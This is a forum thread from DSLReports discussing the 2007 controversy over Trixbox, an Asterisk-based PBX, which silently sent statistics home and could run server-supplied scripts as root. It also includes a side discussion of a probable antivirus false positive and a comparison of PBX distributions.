dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
5495

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

tommy13v

Premium Member

[General] Trixbox phoning home controversy.

Story:

An anonymous reader writes to let us know that users of Trixbox, a PBX based on Asterisk, recently discovered that the software has been phoning home with statistics about their installations. It's easy enough to disable, and not particularly steathy (beyond encrypting the data sent back), but customers in the forum are annoyed at not having been informed of the reporting. Trixbox is owned by Fonality, which makes customized PBXs (again based on Asterisk) for paying customers.

»yro.slashdot.org/yro/07/ ··· 43.shtml
Test99
Premium Member
join:2003-04-24
San Jose, CA

Test99

Premium Member

How do you feel about it, Tommy?

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

tommy13v

Premium Member

To be honest I could care less about the fact that they want to get some stats of the install base but what I do care about is that they are executing as root commands on the box and if there servers are compromised or someone working for them decides he is upset then they could in theory execute a command as root to cause a problem.

I see it as a security risk.
mikesm559
join:2003-11-05
Fresno, CA

mikesm559 to tommy13v

Member

to tommy13v
Looks like from the perl script that this same approach is used by Trixbox Pro and Fonality to grab data from those systems too.

One hacker breaks into update.fonality.com and they can be running scripts on Fonality based PBX's across the world. As root. And I bet that the Fonality PBX's are almost all inside the firewall, so who knows how much damage this thing could do inside a company?

And the Fonality people fess up to Trixbox CE having the issue, but leave out that Fonality and Trixbox Pro systems are just as vulnerable. That really is pretty crappy behavior.
cbrain (banned)
join:2000-05-21
Silver Spring, MD

cbrain (banned) to tommy13v

Member

to tommy13v

Nerd Vittles takes notice

Monday, December 17, 2007
Just Say No: Hidden BOTs and Asterisk Don't Mix

... Our objection is more fundamental and goes to the existence of the tool itself and the failure to disclose it. Unfortunately, a remotely configurable BOT with root access privileges is a bit like giving someone a blank check… with your signature affixed. And it’s worse in this case because users had no notice that they were handing over the keys to their castle by installing and using trixbox. One can’t help wondering if Fonality management really grasps how dangerous such a system design is in this day and age. This isn’t about the commands that Fonality was executing. It’s about the commands that could be executed if this system were ever compromised. We have daily logs full of attempts to hack our systems using, you guessed it, remotely controlled BOTS.
...
»nerdvittles.com/index.php?p=198
Test99
Premium Member
join:2003-04-24
San Jose, CA

Test99

Premium Member

Not Just Trixbox

I recently installed a Windows port of Asterisk from this site: http://www.asteriskwin32.com/ to evaluate it.

The next Zone Alarm scan discovered this nasty critter:

Win32.Backdoor.IRCBot.td
in c:\Program Files\cygroot\bin\cygwin.dll

This is the registry entry:
File: C:\Program Files\cygroot\bin\cygwin1.dll
Module: C:\Program Files\cygroot\bin\cygwin1.dll
RegistryKey: HKEY_CURRENT_USER\Software\Cygnus Solutions
RegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Cygnus Solutions

I'm still investigating to see what I have to do to clean the system.
Expand your moderator at work
cbrain (banned)
join:2000-05-21
Silver Spring, MD

cbrain (banned)

Member

Re: [General] Trixbox phoning home controversy.

said by feelyou22 :

do you feel about it,
I feel hurt ... betrayed ... vulnerable. I never thought free software I was so strongly attracted to would do something like this to me.
hoolahoous
join:2004-08-25
Red Valley, AZ

hoolahoous to tommy13v

Member

to tommy13v
said by tommy13v:

To be honest I could care less about the fact that they want to get some stats of the install base
the implementation was really bad.. it would actually download a script from fonality servers and execute it (possibly as root).
that script could do ANYTHING.. including sniffing your network to installing backdoors/trojans, ____ (fill in your worst case nightmare)

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

tommy13v to Test99

Premium Member

to Test99

Re: Not Just Trixbox

That DLL acts as a Linux API emulation layer providing the linux functionality.
kaila
join:2000-10-11
Lincolnshire, IL

1 edit

kaila to tommy13v

Member

to tommy13v

Re: [General] Trixbox phoning home controversy.

Fonality has been attempting (if quietly) to monetize trixbox and their user base for a while now, and I think this was an obviously not well thought out attempt to collect what users are doing with CE toward that end. While not quite as bad as Sony's rootkit fiasco, it is a pretty serious issue and potentially reputation destroying. Kerry, Chris, and Andrew are certainly getting hammered for it.

Right now they seem to be doing the best they can at the moment (capitulating, and promising to remove the vulnerability), but time will tell if these and future actions will have a positive effect. This is certainly a teaching moment if there ever was one. Trixbox may ultimately benefit if it forces Fonality to rethink what's best for trixbox within their organization.

For now, I'm using PBXiaf.

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

tommy13v

Premium Member

how is PBXiaf going for you?
Test99
Premium Member
join:2003-04-24
San Jose, CA

Test99 to tommy13v

Premium Member

to tommy13v

Re: Not Just Trixbox

said by tommy13v:

That DLL acts as a Linux API emulation layer providing the linux functionality.
Understood. What's not yet clear is where it acquired the ability to take orders from Internet Relay Chat.
kaila
join:2000-10-11
Lincolnshire, IL

kaila to tommy13v

Member

to tommy13v

Re: [General] Trixbox phoning home controversy.

said by tommy13v:

how is PBXiaf going for you?
Amazingly well actually. The install is simple and produces a very stable system. Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script based features. Overall I'm happy and would recommend it to almost anyone.

Ward's the one who got me into asterisk, and he always seems to have the right combination of technical knowledge, careful motivation, and communication skills to put people on the path to successful asterisk based systems.
celtic0 (banned)
join:2001-02-08
USA

celtic0 (banned)

Member

said by kaila:

... Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script based features. Overall I'm happy and would recommend it to almost anyone.
...
What features are in Trixbox that are not included in PBXiaf?
kaila
join:2000-10-11
Lincolnshire, IL

kaila

Member

said by celtic0:

What features are in Trixbox that are not included in PBXiaf?
Both use freePBX for configuring the server, so trixbox really adds nothing over PBXiaf from the standpoint of taking/making/routing calls.

Trixbox does offer HUDlite, trixnet (a kind of trixbox enum service), and literally hundreds of extra packages that a very small minority would find useful. On the other side, PBXiaf offers a small but growing number of their own add-ons as well, that in general have a broader appeal.
rugby
I think I know it all.
join:2000-09-26
Plainfield, IN

rugby to celtic0

Member

to celtic0
A decent endpoint manager for most IP phones.
kaila
join:2000-10-11
Lincolnshire, IL

1 edit

kaila

Member

said by rugby:

A decent endpoint manager for most IP phones.
Agreed. While PBXiaf does offer endpoint management, it is not gui based like trixbox, and requires hand editing config files. Gui based endpoint management is on the freePBX roadmap for version 3, but that release is a long way off....
B04
Premium Member
join:2000-10-28

B04 to Test99

Premium Member

to Test99

Re: Not Just Trixbox

I'm betting (guessing) that it didn't, and that this is a false positive... Good luck. You could try running it by one of the multi-engine scanners (Jotti).

-- B
Test99
Premium Member
join:2003-04-24
San Jose, CA

Test99

Premium Member

said by B04:

I'm betting (guessing) that it didn't, and that this is a false positive...
Good suggestion. You may be right. Scans thus far have not detected any other signs of intrusion. Writing malware detection programs must be a difficult assignment.
B04
Premium Member
join:2000-10-28

B04

Premium Member

Maybe, but I suspect the opposite -- that it's astonishingly EASY, at least as it's currently practiced, and that the rewards are so great that no one has to try very hard.

That's why free products (from AVG to the open source ClamAV project) can perform so well, and that's why the mainstream commercial offerings (McAfee and Symantec) are such festering mounds of bloated feces, and that's why the slightest little change in code lets malware continue to slip by the overwhelming majority of "detectors".

Yeah, it's a losing proposition because one person's trojan is another person's remote control feature, but that's not much excuse for today's shoddy state of affairs. When in doubt, just blame Windows.

-- B
Test99
Premium Member
join:2003-04-24
San Jose, CA

Test99 to tommy13v

Premium Member

to tommy13v

Re: [General] Trixbox phoning home controversy.

Sorry, Tommy. Didn't mean to hijack your thread.

tommy13v
Premium Member
join:2002-02-15
Niskayuna NY

tommy13v

Premium Member

No biggy.